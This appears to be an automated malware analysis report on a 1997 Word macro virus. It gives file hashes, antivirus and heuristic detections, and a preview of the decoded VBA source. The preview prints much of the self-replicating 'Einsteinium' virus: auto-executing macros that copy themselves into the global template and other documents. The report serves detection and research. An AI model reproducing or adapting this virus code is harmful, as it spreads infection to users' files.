Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc5b44a95ac0ed0f…

MALICIOUS

Office (OLE)

64.5 KB Created: 1997-03-23 09:47:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f64cf747556fb7ee314b182989c4ff0a SHA-1: be8f088f2f0c8b57180b3175a23eaa6cda0416f2 SHA-256: bc5b44a95ac0ed0f22bbd0ba9eedd0eeca2bae99ba44db7ceb27c1390573fac6
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

This document exhibits characteristics of a legacy macro virus, specifically identified by 'RSN MACRO VIRUS' markers and the presence of VBA macros. The AutoOpen and Auto_Close macros suggest an intent to execute automatically upon opening and closing the document, likely to infect other documents or spread. The ClamAV detection further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6965646-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6965646-0
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41224 bytes
SHA-256: 189bf1195235b79f1ce58ce51fa06a85c04d2b1e4234aef26d75a9ae823a30ff
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

'Einsteinium v.1.1.  (White Virus)
'Solidarity  M  Forever
'Medan 1997

Dim F$, ww, cn, ca, a, tj$, k, gd, FM1$, FM2$, FM3$, xo$, xc$, xt$, xm$, xf$, xe$, xn$, xg$

Public Sub MAIN()
Attribute MAIN.VB_Description = "3Ein.steinium1"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim wn$
F$ = ""
ww = 0
cn = 0
ca = 0
a = 0
tj$ = ""
k = 0
gd = 0
FM1$ = ""
FM2$ = ""
FM3$ = ""
xo$ = ""
xc$ = ""
xt$ = ""
xm$ = ""
xf$ = ""
xe$ = ""
xn$ = ""
xg$ = ""
WordBasic.DisableInput 1
F$ = WordBasic.[FileName$]()
If F$ = "" Or UCase(WordBasic.[Left$](F$, 8)) = "DOCUMENT" Then GoTo m1
Singkat
wn$ = WordBasic.[WindowName$]()
Dim fsa As Object: Set fsa = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs fsa
If fsa.Format = 0 Then
    fsa.Format = 1
    WordBasic.FileSaveAs fsa
    F$ = WordBasic.[FileName$]()
End If
CariTujuan (k)
WordBasic.Activate wn$
ca = WordBasic.CountMacros(1)
CheckFile
If ca = 0 Then GoTo m1
CheckGlobal
If ww <> 0 Then WordBasic.FileSaveAll 1
m1:
Tutup
Aksi
WordBasic.DisableInput 0
End Sub

Private Sub CariTujuan(k)
Dim i
Dim AN$
Dim su$
Dim CD$
i = 1
k = 0
While i <= WordBasic.CountAddIns()
    AN$ = WordBasic.[GetAddInName$](i)
    If UCase(WordBasic.[Right$](AN$, 10)) = "NARMOL.DOT" Then
        tj$ = AN$
        k = k + 1
        i = WordBasic.CountAddIns()
        WordBasic.AddInState AN$, 1
    End If
    i = i + 1
Wend
su$ = WordBasic.[DefaultDir$](8)
If k < 1 And su$ <> "" Then
    CD$ = WordBasic.[Files$](".")
    WordBasic.ChDir su$
    If WordBasic.[Files$](xn$) <> "" Then
        k = k + 1
        tj$ = su$ + "\" + xn$
    End If
    If CD$ <> "" Then WordBasic.ChDir CD$
End If
If k < 1 And su$ <> "" Then
    tj$ = su$ + "\" + xn$
    WordBasic.FileNew
    On Error GoTo -1: On Error GoTo ct1
    WordBasic.FileSaveAs Name:=tj$, Format:=1
    k = k + 1
ct1:
End If
If k < 1 And su$ = "" Then
    tj$ = "zxz"
    cn = WordBasic.CountMacros(0)
Else
    cn = WordBasic.CountMacros(0, 0, 1)
End If
End Sub

Private Sub CheckFile()
Dim o
Dim x
Dim h
Dim MA$
Dim MD$
Dim si$
Dim j
If ca = 0 Then TularFile
o = 0
ReDim sp__$(ca)
x = 0
For h = 1 To ca
    MA$ = WordBasic.[MacroName$](h, 1)
    MD$ = WordBasic.[MacroDesc$](MA$)
    If Tes(MD$) = 1 Then
        si$ = Mid(MD$, 2, 3)
        If si$ = "Ein" Then
            FM1$ = MA$
        ElseIf si$ = "han" Then
            FM2$ = MA$
        ElseIf si$ = "pen" Then
            FM3$ = MA$
        End If
        o = o + 1
    ElseIf UCase(MA$) = "AUTOOPEN" Or UCase(MA$) = "AUTOCLOSE" Then
        x = x + 1
        sp__$(x) = MA$
    End If
Next h
If x = 0 And o = 3 Then GoTo cf1
If x > 0 Then
    For j = 1 To x
        MD$ = WordBasic.[MacroDesc$](sp__$(j))
        If Tes(MD$) = 1 Then GoTo lain
        On Error GoTo -1: On Error GoTo lain
        WordBasic.Organizer Delete:=1, Source:=F$, Name:=sp__$(j), Tab:=3
lain:
    Next j
End If
If o <> 3 And ca <> 0 Then TularFile
cf1:
End Sub

Private Sub TularFile()
Dim y
Dim i
Dim FM$
Dim GM$
ReDim SM__$(3)
ReDim TM__$(3)
If a < 4 Then TM__$(1) = xo$ Else TM__$(1) = xc$
TM__$(2) = pl$(y)
tf1:
TM__$(3) = pl$(y)
If UCase(TM__$(2)) = UCase(TM__$(1)) Then GoTo tf1
SM__$(1) = xe$
SM__$(2) = xf$
SM__$(3) = xt$
For i = 1 To 3
    If tj$ <> "zxz" Then
        On Error GoTo -1: On Error GoTo tf2
        WordBasic.Organizer Copy:=1, Source:=tj$, Destination:=F$, Name:=SM__$(i), Tab:=3
        WordBasic.Organizer Rename:=1, Source:=F$, Name:=SM__$(i), NewName:=TM__$(i), Tab:=3
tf2:
    Else
        FM$ = F$ + ":" + TM__$(i)
        GM$ = xg$ + SM__$(i)
        On Error GoTo -1: On Error GoTo tf3
        WordBasic.MacroCopy GM$, FM$,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.